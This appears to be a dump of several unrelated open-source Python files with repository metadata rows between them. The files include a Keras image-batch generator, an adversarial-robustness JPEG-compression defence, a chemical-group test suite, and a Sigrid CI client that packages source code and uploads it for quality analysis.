def preprocess_group_entry(self, image, annotations):
""" Preprocess image and its annotations.
"""
# preprocess the image
image = self.preprocess_image(image)
# resize image
image, image_scale = self.resize_image(image)
# apply resizing to annotations too
annotations['bboxes'] *= image_scale
# convert to the wanted keras floatx
image = keras.backend.cast_to_floatx(image)
return image, annotations
def preprocess_group(self, image_group, annotations_group):
""" Preprocess each image and its annotations in its group.
"""
assert(len(image_group) == len(annotations_group))
for index in range(len(image_group)):
# preprocess a single group entry
image_group[index], annotations_group[index] = self.preprocess_group_entry(image_group[index], annotations_group[index])
# import IPython;IPython.embed()
return image_group, annotations_group
def group_images(self):
""" Order the images according to self.order and makes groups of self.batch_size.
"""
# determine the order of the images
order = list(range(self.size()))
if self.group_method == 'random':
random.shuffle(order)
elif self.group_method == 'ratio':
order.sort(key=lambda x: self.image_aspect_ratio(x))
# divide into groups, one group = one batch
self.groups = [[order[x % len(order)] for x in range(i, i + self.batch_size)] for i in range(0, len(order), self.batch_size)]
def compute_inputs(self, image_group):
""" Compute inputs for the network using an image_group.
"""
# get the max image shape
# max_shape = tuple(max(image.shape[x] for image in image_group) for x in range(3))
# import IPython;IPython.embed()
# i=0
max_shape_list=[]
max_shape_array=[]
# for i in range (len(image_group[0])):
max_shape = tuple(max(image.shape[x] for image in image_group) for x in range(4))
# max_shape = tuple(max(image_group[0].shape[x] for image in image_group[0]) for x in range(3))
# max_shape_conv = list(max_shape)
# max_shape_list.append(max_shape)
# i+1
# max_shape_conclusion = list(max(max_shape_list,key=lambda item:item[1]))
# num_max_shape_array=len(max_shape_list)
# max_shape_array=max_shape_conclusion
# max_shape_array.insert(0, num_max_shape_array)
# max_shape_array=tuple(max_shape_array)
# max_shape_array= tuple(num_max_shape_array, max_shape_conclusion[0], max_shape_conclusion[1], max_shape_conclusion[2])
# max_shape_array=np.stack((max_shape_list[0], max_shape_list[1], max_shape_list[2], max_shape_list[3], max_shape_list[4], max_shape_list[5], max_shape_list[6], max_shape_list[7], max_shape_list[8], max_shape_list[9],
# max_shape_list[10], max_shape_list[11], max_shape_list[12], max_shape_list[13], max_shape_list[14], max_shape_list[15], max_shape_list[16], max_shape_list[17], max_shape_list[18], max_shape_list[19],
# max_shape_list[20], max_shape_list[21], max_shape_list[22], max_shape_list[23], max_shape_list[24], max_shape_list[25], max_shape_list[26], max_shape_list[27], max_shape_list[28], max_shape_list[29],
# max_shape_list[30], max_shape_list[31]), axis=0)
# print('max_shape')
# import IPython;IPython.embed()
# construct an image batch object
image_batch = np.zeros((self.batch_size,) + max_shape, dtype=keras.backend.floatx())
# print('construct an image batch object')
# import IPython;IPython.embed()
# copy all images to the upper left part of the image batch object
# image_batch[image_index, :image.shape[0], :image.shape[1], :image.shape[2]] = image
for image_index, image in enumerate(image_group):
# import IPython;IPython.embed()
# for i in range (len(image)):
image_batch[image_index, :image.shape[0], :image.shape[1], :image.shape[2], :image.shape[3]] = image
# print('copy all image')
# import IPython;IPython.embed()
if keras.backend.image_data_format() == 'channels_first':
image_batch = image_batch.transpose((0, 4, 1, 2, 3))
# import IPython;IPython.embed()
return image_batch
def generate_anchors(self, image_shape):
anchor_params = None
if self.config and 'anchor_parameters' in self.config:
anchor_params = parse_anchor_parameters(self.config)
return anchors_for_shape(image_shape, anchor_params=anchor_params, shapes_callback=self.compute_shapes)
def compute_targets(self, image_group, annotations_group):
""" Compute target outputs for the network using images and their annotations.
"""
# get the max image shape
max_shape = tuple(max(image.shape[x] for image in image_group[0]) for x in range(3))
# print('debug compute_targets_max_shape')
# import IPython;IPython.embed()
anchors = self.generate_anchors(max_shape)
batches = self.compute_anchor_targets(
anchors,
image_group,
annotations_group,
self.num_classes()
)
return list(batches)
def compute_input_output(self, group):
""" Compute inputs and target outputs for the network.
"""
# load images and annotations
image_group = self.load_image_group(group)
annotations_group = self.load_annotations_group(group)
# print('load images & annotations')
# import IPython;IPython.embed()
# check validity of annotations
image_group, annotations_group = self.filter_annotations(image_group, annotations_group, group)
# randomly transform data
image_group, annotations_group = self.random_transform_group(image_group, annotations_group)
# print('randomly transform data')
# import IPython;IPython.embed()
# perform preprocessing steps
image_group, annotations_group = self.preprocess_group(image_group, annotations_group)
# print('perform preprocessing steps')
# import IPython;IPython.embed()
# compute network inputs
inputs = self.compute_inputs(image_group)
# print('compute network inputs')
# import IPython;IPython.embed()
# compute network targets
targets = self.compute_targets(image_group, annotations_group)
return inputs, targets
def __len__(self):
"""
Number of batches for generator.
"""
return len(self.groups)
def __getitem__(self, index):
"""
Keras sequence method for generating batches.
"""
group = self.groups[index]
inputs, targets = self.compute_input_output(group)
# inputs1=inputs.copy()
# inputs2=inputs.copy()
# inputs3=inputs.copy()
# inputs4=inputs.copy()
# inputs5=inputs.copy()
# inputs6=inputs.copy()
# inputs7=inputs.copy()
# inputs8=inputs.copy()
# inputs9=inputs.copy()
# inputs10=inputs.copy()
# inputs11=inputs.copy()
# inputs12=inputs.copy()
# inputs13=inputs.copy()
# inputs14=inputs.copy()
# inputs15=inputs.copy()
# inputs16=inputs.copy()
# inputs17=inputs.copy()
# inputs18=inputs.copy()
# inputs19=inputs.copy()
# inputs20=inputs.copy()
# inputs21=inputs.copy()
# inputs22=inputs.copy()
# inputs23=inputs.copy()
# inputs24=inputs.copy()
# inputs25=inputs.copy()
# inputs26=inputs.copy()
# inputs27=inputs.copy()
# inputs28=inputs.copy()
# inputs29=inputs.copy()
# inputs30=inputs.copy()
# inputs31=inputs.copy()
# inputs32=inputs.copy()
# inputsss=np.stack((inputs1, inputs2, inputs3, inputs4, inputs5, inputs6, inputs7, inputs8, inputs9, inputs10,
# inputs11, inputs12, inputs13, inputs14, inputs15, inputs16, inputs17, inputs18, inputs19, inputs20,
# inputs21, inputs22, inputs23, inputs24, inputs25, inputs26, inputs27, inputs28, inputs29, inputs30,
# inputs31, inputs32), axis=1)
# targets = [targets[0], targets[1]]
return inputs, targets
| 42.125285 | 225 | 0.635592 |
fec93b3c93e8dea0f507d2f08bc15bfca3f4631d | 574 | py | Python | test_package/conanfile.py | FromAlaska/CS372Proj1 | 36091b033b8166a6f1ec93f5915f49430b995c3e | [
"BSL-1.0"
] | 3 | 2020-05-09T17:21:06.000Z | 2020-11-25T07:14:54.000Z | test_package/conanfile.py | FromAlaska/CS372Proj1 | 36091b033b8166a6f1ec93f5915f49430b995c3e | [
"BSL-1.0"
] | null | null | null | test_package/conanfile.py | FromAlaska/CS372Proj1 | 36091b033b8166a6f1ec93f5915f49430b995c3e | [
"BSL-1.0"
] | null | null | null | #!/usr/bin/env python
from os import getenv
from os import path
from conans import ConanFile
from conans import CMake
class CatchConanTest(ConanFile):
generators = "cmake"
settings = "os", "compiler", "arch", "build_type"
username = getenv("CONAN_USERNAME", "philsquared")
channel = getenv("CONAN_CHANNEL", "testing")
requires = "Catch/2.1.2@%s/%s" % (username, channel)
def build(self):
cmake = CMake(self)
cmake.configure(build_dir="./")
cmake.build()
def test(self):
self.run(path.join("bin", "CatchTest"))
| 26.090909 | 56 | 0.648084 |
f0f232ef1c6040a4421f4c69e1c2e73f55f32fa1 | 8,534 | py | Python | art/defences/preprocessor/jpeg_compression.py | mcguires5/adversarial-robustness-toolbox | f8b0552859eaf31c5b66e1d14d28b89178795ad0 | [
"MIT"
] | 1 | 2020-07-12T03:45:23.000Z | 2020-07-12T03:45:23.000Z | art/defences/preprocessor/jpeg_compression.py | mcguires5/adversarial-robustness-toolbox | f8b0552859eaf31c5b66e1d14d28b89178795ad0 | [
"MIT"
] | 105 | 2020-08-24T06:15:43.000Z | 2022-03-24T08:03:16.000Z | art/defences/preprocessor/jpeg_compression.py | mcguires5/adversarial-robustness-toolbox | f8b0552859eaf31c5b66e1d14d28b89178795ad0 | [
"MIT"
] | null | null | null | # MIT License
#
# Copyright (C) The Adversarial Robustness Toolbox (ART) Authors 2018
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
# Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
This module implements the JPEG compression defence `JpegCompression`.
| Paper link: https://arxiv.org/abs/1705.02900, https://arxiv.org/abs/1608.00853
| Please keep in mind the limitations of defences. For more information on the limitations of this defence, see
https://arxiv.org/abs/1802.00420 . For details on how to evaluate classifier security in general, see
https://arxiv.org/abs/1902.06705
"""
from __future__ import absolute_import, division, print_function, unicode_literals
from io import BytesIO
import logging
from typing import Optional, Tuple
import numpy as np
from tqdm import tqdm
from art.config import ART_NUMPY_DTYPE, CLIP_VALUES_TYPE
from art.defences.preprocessor.preprocessor import Preprocessor
from art.utils import Deprecated, deprecated_keyword_arg
logger = logging.getLogger(__name__)
class JpegCompression(Preprocessor):
"""
Implement the JPEG compression defence approach.
| Paper link: https://arxiv.org/abs/1705.02900, https://arxiv.org/abs/1608.00853
| Please keep in mind the limitations of defences. For more information on the limitations of this defence,
see https://arxiv.org/abs/1802.00420 . For details on how to evaluate classifier security in general, see
https://arxiv.org/abs/1902.06705
"""
params = ["quality", "channel_index", "channels_first", "clip_values"]
@deprecated_keyword_arg("channel_index", end_version="1.5.0", replaced_by="channels_first")
def __init__(
self,
clip_values: CLIP_VALUES_TYPE,
quality: int = 50,
channel_index=Deprecated,
channels_first: bool = False,
apply_fit: bool = True,
apply_predict: bool = True,
):
"""
Create an instance of JPEG compression.
:param clip_values: Tuple of the form `(min, max)` representing the minimum and maximum values allowed
for features.
:param quality: The image quality, on a scale from 1 (worst) to 95 (best). Values above 95 should be avoided.
:param channel_index: Index of the axis in data containing the color channels or features.
:type channel_index: `int`
:param channels_first: Set channels first or last.
:param apply_fit: True if applied during fitting/training.
:param apply_predict: True if applied during predicting.
"""
# Remove in 1.5.0
if channel_index == 3:
channels_first = False
elif channel_index == 1:
channels_first = True
elif channel_index is not Deprecated:
raise ValueError("Not a proper channel_index. Use channels_first.")
super(JpegCompression, self).__init__()
self._is_fitted = True
self._apply_fit = apply_fit
self._apply_predict = apply_predict
self.quality = quality
self.channel_index = channel_index
self.channels_first = channels_first
self.clip_values = clip_values
self._check_params()
@property
def apply_fit(self) -> bool:
return self._apply_fit
@property
def apply_predict(self) -> bool:
return self._apply_predict
def _compress(self, x: np.ndarray, mode: str) -> np.ndarray:
"""
Apply JPEG compression to image input.
"""
from PIL import Image
tmp_jpeg = BytesIO()
x_image = Image.fromarray(x, mode=mode)
x_image.save(tmp_jpeg, format="jpeg", quality=self.quality)
x_jpeg = np.array(Image.open(tmp_jpeg))
tmp_jpeg.close()
return x_jpeg
def __call__(self, x: np.ndarray, y: Optional[np.ndarray] = None) -> Tuple[np.ndarray, Optional[np.ndarray]]:
"""
Apply JPEG compression to sample `x`.
:param x: Sample to compress with shape of `NCHW`, `NHWC`, `NCFHW` or `NFHWC`. `x` values are expected to be in
the data range [0, 1] or [0, 255].
:param y: Labels of the sample `x`. This function does not affect them in any way.
:return: compressed sample.
"""
x_ndim = x.ndim
if x_ndim not in [4, 5]:
raise ValueError(
"Unrecognized input dimension. JPEG compression can only be applied to image and video data."
)
if x.min() < 0.0:
raise ValueError(
"Negative values in input `x` detected. The JPEG compression defence requires unnormalized input."
)
# Swap channel index
if self.channels_first and x_ndim == 4:
# image shape NCHW to NHWC
x = np.transpose(x, (0, 2, 3, 1))
elif self.channels_first and x_ndim == 5:
# video shape NCFHW to NFHWC
x = np.transpose(x, (0, 2, 3, 4, 1))
# insert temporal dimension to image data
if x_ndim == 4:
x = np.expand_dims(x, axis=1)
# Convert into uint8
if self.clip_values[1] == 1.0:
x = x * 255
x = x.astype("uint8")
# Set image mode
if x.shape[-1] == 1:
image_mode = "L"
elif x.shape[-1] == 3:
image_mode = "RGB"
else:
raise NotImplementedError("Currently only support `RGB` and `L` images.")
# Prepare grayscale images for "L" mode
if image_mode == "L":
x = np.squeeze(x, axis=-1)
# Compress one image at a time
x_jpeg = x.copy()
for idx in tqdm(np.ndindex(x.shape[:2]), desc="JPEG compression"):
x_jpeg[idx] = self._compress(x[idx], image_mode)
# Undo preparation grayscale images for "L" mode
if image_mode == "L":
x_jpeg = np.expand_dims(x_jpeg, axis=-1)
# Convert to ART dtype
if self.clip_values[1] == 1.0:
x_jpeg = x_jpeg / 255.0
x_jpeg = x_jpeg.astype(ART_NUMPY_DTYPE)
# remove temporal dimension for image data
if x_ndim == 4:
x_jpeg = np.squeeze(x_jpeg, axis=1)
# Swap channel index
if self.channels_first and x_jpeg.ndim == 4:
# image shape NHWC to NCHW
x_jpeg = np.transpose(x_jpeg, (0, 3, 1, 2))
elif self.channels_first and x_ndim == 5:
# video shape NFHWC to NCFHW
x_jpeg = np.transpose(x_jpeg, (0, 4, 1, 2, 3))
return x_jpeg, y
def estimate_gradient(self, x: np.ndarray, grad: np.ndarray) -> np.ndarray:
return grad
def fit(self, x: np.ndarray, y: Optional[np.ndarray] = None, **kwargs) -> None:
"""
No parameters to learn for this method; do nothing.
"""
pass
def _check_params(self) -> None:
if not isinstance(self.quality, (int, np.int)) or self.quality <= 0 or self.quality > 100:
raise ValueError("Image quality must be a positive integer <= 100.")
if len(self.clip_values) != 2:
raise ValueError("'clip_values' should be a tuple of 2 floats or arrays containing the allowed data range.")
if np.array(self.clip_values[0] >= self.clip_values[1]).any():
raise ValueError("Invalid 'clip_values': min >= max.")
if self.clip_values[0] != 0:
raise ValueError("'clip_values' min value must be 0.")
if self.clip_values[1] != 1.0 and self.clip_values[1] != 255:
raise ValueError("'clip_values' max value must be either 1 or 255.")
| 39.146789 | 120 | 0.641551 |
1e0624e15aa5581eb0621e7c27eb9f6dbbb9cd13 | 231 | py | Python | AdHoc/ADDREV.py | PK-100/Competitive_Programming | d0863feaaa99462b2999e85dcf115f7a6c08bb8d | [
"MIT"
] | 70 | 2018-06-25T21:20:15.000Z | 2022-03-24T03:55:17.000Z | AdHoc/ADDREV.py | An3sha/Competitive_Programming | ee7eadf51939a360d0b004d787ebabda583e92f0 | [
"MIT"
] | 4 | 2018-09-04T13:12:20.000Z | 2021-06-20T08:29:12.000Z | AdHoc/ADDREV.py | An3sha/Competitive_Programming | ee7eadf51939a360d0b004d787ebabda583e92f0 | [
"MIT"
] | 24 | 2018-12-26T05:15:32.000Z | 2022-01-23T23:04:54.000Z | # Problem: https://www.spoj.com/IITRPRF1/problems/ADDREV/
def rev(n):
st=str(n)
st=st[::-1]
s=int(st)
return s
t=int(input())
for _ in range(t):
m,n=[int(x) for x in input().strip().split()]
s=rev(m) + rev(n)
print(rev(s)) | 17.769231 | 57 | 0.61039 |
b8f38690af9e648addd16f928f8ada07719f1bc3 | 5,483 | py | Python | commongroups/tests/test_commongroups.py | akokai/commongroups | 03c67b7f015c7f939a2f8122583dee1b38e64a56 | [
"MIT"
] | 3 | 2017-04-27T06:49:38.000Z | 2020-09-20T13:47:49.000Z | commongroups/tests/test_commongroups.py | akokai/commongroups | 03c67b7f015c7f939a2f8122583dee1b38e64a56 | [
"MIT"
] | 7 | 2017-03-23T20:08:03.000Z | 2017-11-13T03:59:37.000Z | commongroups/tests/test_commongroups.py | akokai/commongroups | 03c67b7f015c7f939a2f8122583dee1b38e64a56 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Test suite for commongroups program architecture.
For tests of database query logic, stay tuned...
Depends:
Home environment is configured; structure-searchable database exists and
PostgreSQL is running; Google Sheets access is configured.
Side-effects:
Creates directories and log files.
"""
# pylint: disable=invalid-name,missing-docstring
from itertools import islice
import json
import os
from os.path import exists, join as pjoin
from pkg_resources import resource_filename, resource_string
from pandas import DataFrame
import pytest
from sqlalchemy.engine import Engine
from sqlalchemy.sql import Select
from commongroups.cmgroup import CMGroup
from commongroups.env import CommonEnv
from commongroups.errors import MissingParamError, NoCredentialsError
from commongroups.hypertext import directory
from commongroups.googlesheet import SheetManager
from commongroups.ops import (batch_process,
cmgs_from_file,
cmgs_from_googlesheet,
collect_to_json)
from commongroups.query import QueryMethod, get_query_results
PARAMS_JSON = resource_filename(__name__, 'params.json')
LOCAL_PARAMS = json.loads(resource_string(__name__, 'params.json').decode())
PAR_FAIL_QM = {'cmg_id': 'x666666', 'name': 'Incomplete parameters'}
TEST_LIMIT = 5
# Instantiate a few objects to run multiple tests on:
env = CommonEnv('test', google_worksheet='test')
env.connect_database()
blank_env = CommonEnv(env_path=env.results_path)
# Define a few generic helper functions for the tests.
def check_params(params):
"""
Verify that group parameters read from file or Google Sheet are OK.
The argument should be a params data structure for creating a single group,
not a list of parameters for many group.
"""
assert isinstance(params, dict)
assert 'params' in params.keys()
assert 'info' in params.keys()
assert 'notes' in params['info'].keys()
def check_cmg(cmg):
assert isinstance(cmg, CMGroup)
assert isinstance(cmg.cmg_id, str)
assert isinstance(cmg.params, dict)
assert isinstance(cmg.info, dict)
assert 'notes' in cmg.info
cmg.add_info({'Added info': 'Success!'})
assert 'Added info' in cmg.info
# Tests:
def test_env_config():
assert env.config['google_worksheet'] == 'test'
assert len(blank_env.config) == 0
with pytest.raises(MissingParamError):
blank_env.connect_database()
with pytest.raises(MissingParamError):
gen = cmgs_from_googlesheet(blank_env)
def test_env_db():
env.connect_database()
assert isinstance(env.database, Engine)
def test_cmgs_IO():
for params in LOCAL_PARAMS:
check_params(params)
cmg_gen_json = cmgs_from_file(env, PARAMS_JSON)
cmgs = list(islice(cmg_gen_json, None))
assert len(cmgs) > 2
for cmg in cmgs:
check_cmg(cmg)
coll_json_path = pjoin(env.results_path, 'cmgroups.json')
collect_to_json(cmgs, env)
assert exists(coll_json_path)
html_dir_path = pjoin(env.results_path, 'html', 'index.html')
directory(cmgs, env)
assert exists(html_dir_path)
def test_googlesheet():
with pytest.raises(NoCredentialsError):
gsm = SheetManager('Untitled', 'Sheet 1', 'KEYFILE.DNE')
sheet = SheetManager(env.config['google_sheet_title'],
env.config['google_worksheet'],
env.config['google_key_file'])
google_params = list(islice(sheet.get_params(), None))
for params in google_params:
check_params(params)
cmg_gen = cmgs_from_googlesheet(env)
cmgs = list(islice(cmg_gen, None))
assert len(cmgs) > 2
for cmg in cmgs:
check_cmg(cmg)
path = pjoin(env.results_path, 'google_params.json')
sheet.params_to_json(path)
assert exists(path)
def test_querymethod():
for params in [PAR_FAIL_QM, ]:
with pytest.raises(MissingParamError):
bad_qmd = QueryMethod(params)
qmd = QueryMethod(LOCAL_PARAMS[0]['params'])
assert isinstance(qmd.get_literal(), str)
assert isinstance(qmd.expression, Select)
qmd.expression = qmd.expression.limit(TEST_LIMIT)
res = get_query_results(qmd.expression, env.database)
assert isinstance(res, DataFrame)
assert len(res) == TEST_LIMIT
def test_cmg_process():
cmg = CMGroup(env, LOCAL_PARAMS[0]['params'], LOCAL_PARAMS[0]['info'])
cmg.create_query()
assert isinstance(cmg.query, QueryMethod)
assert isinstance(cmg.query.get_literal(), str)
assert isinstance(cmg.query.expression, Select)
# Use the process() method
cmg.process(env.database)
assert isinstance(cmg.compounds, DataFrame)
assert isinstance(cmg.info, dict)
assert 'about' in cmg.info
assert isinstance(cmg.info['count'], int)
assert cmg.info['sql'] == cmg.query.get_literal()
cmg.to_json()
cmg.to_html(formats=['json'])
def test_batch_process():
cmg_gen = cmgs_from_file(env, PARAMS_JSON)
cmgs_done = batch_process(cmg_gen, env)
for cmg in cmgs_done:
check_cmg(cmg)
assert exists(
pjoin(cmg.results_path, '{}.json'.format(cmg.cmg_id))
)
assert exists(
pjoin(cmg.results_path, '{}.xlsx'.format(cmg.cmg_id))
)
assert exists(
pjoin(cmg.results_path, 'html', '{}.html'.format(cmg.cmg_id))
)
assert exists(pjoin(env.results_path, 'html', 'index.html'))
| 31.331429 | 79 | 0.696881 |
aab370f7ae7a2c26319af0dd800be937d809261f | 302 | py | Python | cfopenapi/blueprints/core.py | joaopcanario/cfopen-api | 3a91736feaaab02160344c9d49a9a21be1eaa621 | [
"MIT"
] | null | null | null | cfopenapi/blueprints/core.py | joaopcanario/cfopen-api | 3a91736feaaab02160344c9d49a9a21be1eaa621 | [
"MIT"
] | null | null | null | cfopenapi/blueprints/core.py | joaopcanario/cfopen-api | 3a91736feaaab02160344c9d49a9a21be1eaa621 | [
"MIT"
] | null | null | null | from flask import Blueprint, redirect, url_for, jsonify
core_bp = Blueprint("core_bp", __name__)
@core_bp.route('/', methods=['GET'])
def root():
try:
return redirect(url_for('flasgger.apidocs')), 302
except Exception:
return jsonify("API Documentation isn't loaded!"), 200
| 23.230769 | 62 | 0.678808 |
d91ed4fbf3c8e626f4aabee96db4012540973a47 | 59 | py | Python | syncplay/__init__.py | weeb-poly/syncplay-proxy | 71e7a847bd684dcfef35fe290d47d2c328b25743 | [
"Apache-2.0"
] | 2 | 2021-09-06T18:42:16.000Z | 2022-03-07T19:29:56.000Z | syncplay/__init__.py | weeb-poly/syncplay-proxy | 71e7a847bd684dcfef35fe290d47d2c328b25743 | [
"Apache-2.0"
] | null | null | null | syncplay/__init__.py | weeb-poly/syncplay-proxy | 71e7a847bd684dcfef35fe290d47d2c328b25743 | [
"Apache-2.0"
] | 1 | 2021-12-30T15:33:07.000Z | 2021-12-30T15:33:07.000Z | projectURL = 'https://github.com/weeb-poly/syncplay-proxy'
| 29.5 | 58 | 0.762712 |
1e583dc7dccb91cc1a05f53b56d187a09c980e5a | 20,216 | py | Python | sigridci/sigridci.py | Software-Improvement-Group/sigridci | c3c4b248a6b8cfcbf0b0c7634413e3c5816ff9f0 | [
"Apache-2.0"
] | 15 | 2021-02-17T10:52:16.000Z | 2022-03-09T09:57:53.000Z | sigridci/sigridci.py | Software-Improvement-Group/sigridci | c3c4b248a6b8cfcbf0b0c7634413e3c5816ff9f0 | [
"Apache-2.0"
] | 18 | 2021-02-17T14:51:06.000Z | 2022-03-23T08:44:51.000Z | sigridci/sigridci.py | Software-Improvement-Group/sigridci | c3c4b248a6b8cfcbf0b0c7634413e3c5816ff9f0 | [
"Apache-2.0"
] | 11 | 2021-02-17T11:27:55.000Z | 2022-03-07T15:06:39.000Z | #!/usr/bin/env python3
# Copyright Software Improvement Group
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import base64
import datetime
import dataclasses
import html
import json
import os
import re
import sys
import time
import typing
import urllib.parse
import urllib.request
import zipfile
LOG_HISTORY = []
def log(message):
timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
print(f"{timestamp} {message}", flush=True)
LOG_HISTORY.append(message)
@dataclasses.dataclass
class UploadOptions:
sourceDir: str = None
excludePatterns: typing.List[str] = dataclasses.field(default_factory=lambda: [])
includeHistory: bool = False
pathPrefix: str = ""
showContents: bool = False
@dataclasses.dataclass
class TargetQuality:
ratings: typing.Dict[str, float]
def __init__(self, configFile, targetRating):
self.ratings = {"MAINTAINABILITY" : targetRating}
if os.path.exists(configFile):
log(f"Loading target quality level from configuration file {configFile}")
# We can't use pyyaml because PIP is not available in the some of the
# very diverse set of customer environments where Sigrid CI is used.
targetPattern = re.compile("(" + "|".join(Report.METRICS) + "):\s*([\d\.]+)", re.IGNORECASE)
for line in open(configFile, "r"):
match = targetPattern.match(line.strip())
if match:
self.ratings[match.group(1).upper()] = float(match.group(2))
def meetsTargetQualityForMetric(self, feedback, metric):
value = feedback["newCodeRatings"].get(metric, None)
targetRating = self.ratings.get(metric, None)
return value == None or targetRating == None or value >= targetRating
def meetsOverallQualityTarget(self, feedback):
return all(self.meetsTargetQualityForMetric(feedback, metric) for metric in self.ratings)
class SigridApiClient:
PROTOCOL_VERSION = "v1"
POLL_INTERVAL = 60
POLL_ATTEMPTS = 60
RETRY_ATTEMPTS = 5
def __init__(self, args):
self.baseURL = args.sigridurl
self.account = os.environ["SIGRID_CI_ACCOUNT"]
self.token = os.environ["SIGRID_CI_TOKEN"]
self.urlPartnerName = urllib.parse.quote_plus(args.partner.lower())
self.urlCustomerName = urllib.parse.quote_plus(args.customer.lower())
self.urlSystemName = urllib.parse.quote_plus(args.system.lower())
self.publish = args.publish or args.publishonly
def callSigridAPI(self, api, path):
url = f"{self.baseURL}/rest/{api}{path}"
request = urllib.request.Request(url, None)
request.add_header("Accept", "application/json")
request.add_header("Authorization", \
b"Basic " + base64.standard_b64encode(f"{self.account}:{self.token}".encode("utf8")))
response = urllib.request.urlopen(request)
if response.status == 204:
return {}
responseBody = response.read().decode("utf8")
if len(responseBody) == 0:
log("Received empty response")
return {}
return json.loads(responseBody)
def submitUpload(self, options):
log("Creating upload")
uploadPacker = SystemUploadPacker(options)
upload = "sigrid-upload-" + datetime.datetime.now().strftime("%Y%m%d-%H%M%S") + ".zip"
uploadPacker.prepareUpload(options.sourceDir, upload)
log("Preparing upload")
uploadLocation = self.obtainUploadLocation()
uploadUrl = uploadLocation["uploadUrl"]
analysisId = uploadLocation["ciRunId"]
log(f"Sigrid CI analysis ID: {analysisId}")
log("Publishing upload" if self.publish else "Submitting upload")
if not self.uploadBinaryFile(uploadUrl, upload):
raise Exception("Uploading file failed")
return analysisId
def obtainUploadLocation(self):
for attempt in range(self.RETRY_ATTEMPTS):
try:
return self.callSigridAPI("inboundresults", self.getRequestUploadPath())
except urllib.error.HTTPError as e:
if e.code == 502:
log("Retrying")
time.sleep(self.POLL_INTERVAL)
else:
self.processHttpError(e)
log("Sigrid is currently unavailable")
sys.exit(1)
def getRequestUploadPath(self):
path = f"/{self.urlPartnerName}/{self.urlCustomerName}/{self.urlSystemName}/ci/uploads/{self.PROTOCOL_VERSION}"
if self.publish:
path += "/publish"
return path
def uploadBinaryFile(self, url, upload):
with open(upload, "rb") as uploadRef:
uploadRequest = urllib.request.Request(url, data=uploadRef.read())
uploadRequest.method = "PUT"
uploadRequest.add_header("Content-Type", "application/zip")
uploadRequest.add_header("Content-Length", "%d" % os.path.getsize(upload))
uploadRequest.add_header("x-amz-server-side-encryption", "AES256")
uploadResponse = urllib.request.urlopen(uploadRequest)
return uploadResponse.status in [200, 201, 202]
def fetchAnalysisResults(self, analysisId):
for attempt in range(self.POLL_ATTEMPTS):
try:
response = self.callSigridAPI("analysis-results",
f"/sigridci/{self.urlCustomerName}/{self.urlSystemName}/{self.PROTOCOL_VERSION}/ci/results/{analysisId}")
if response != {}:
return response
except urllib.error.HTTPError as e:
self.processHttpError(e)
except json.JSONDecodeError as e:
log("Received incomplete analysis results")
log("Waiting for analysis results")
time.sleep(self.POLL_INTERVAL)
log("Analysis failed: waiting for analysis results took too long")
sys.exit(1)
def processHttpError(self, e):
if e.code in [401, 403]:
log("You are not authorized to access Sigrid for this system")
sys.exit(1)
elif e.code == 404:
log("Analysis results not yet available")
elif e.code >= 500:
log(f"Sigrid is currently not available (HTTP status {e.code})")
sys.exit(1)
else:
raise Exception(f"Received HTTP status {e.code}")
class SystemUploadPacker:
MAX_UPLOAD_SIZE_MB = 500
DEFAULT_EXCLUDES = [
"coverage/",
"build/",
"dist/",
"node_modules/",
"sigridci/",
"sigrid-ci-output/",
"target/",
".idea/",
".jpg",
".png"
]
def __init__(self, options):
self.excludePatterns = [] + (options.excludePatterns or []) + self.DEFAULT_EXCLUDES
self.excludePatterns = [excl for excl in self.excludePatterns if excl != ""]
if not options.includeHistory:
self.excludePatterns += [".git/", ".gitmodules"]
self.pathPrefix = options.pathPrefix.strip("/")
self.showContents = options.showContents
def prepareUpload(self, sourceDir, outputFile):
zipFile = zipfile.ZipFile(outputFile, "w", zipfile.ZIP_DEFLATED)
for root, dirs, files in os.walk(sourceDir):
for file in sorted(files):
filePath = os.path.join(root, file)
if file != outputFile and not self.isExcluded(filePath):
relativePath = os.path.relpath(os.path.join(root, file), sourceDir)
uploadPath = self.getUploadFilePath(relativePath)
if self.showContents:
log(f"Adding file to upload: {uploadPath}")
zipFile.write(filePath, uploadPath)
zipFile.close()
self.checkUploadContents(outputFile)
def checkUploadContents(self, outputFile):
uploadSizeBytes = os.path.getsize(outputFile)
uploadSizeMB = max(round(uploadSizeBytes / 1024 / 1024), 1)
log(f"Upload size is {uploadSizeMB} MB")
if uploadSizeMB > self.MAX_UPLOAD_SIZE_MB:
raise Exception(f"Upload exceeds maximum size of {self.MAX_UPLOAD_SIZE_MB} MB")
if uploadSizeBytes < 50000:
log("Warning: Upload is very small, source directory might not contain all source code")
def getUploadFilePath(self, relativePath):
if self.pathPrefix == "":
return relativePath
return f"{self.pathPrefix}/{relativePath}"
def isExcluded(self, filePath):
normalizedPath = filePath.replace("\\", "/")
for exclude in self.excludePatterns:
if exclude.strip() in normalizedPath:
return True
return False
class Report:
METRICS = ["VOLUME", "DUPLICATION", "UNIT_SIZE", "UNIT_COMPLEXITY", "UNIT_INTERFACING", "MODULE_COUPLING",
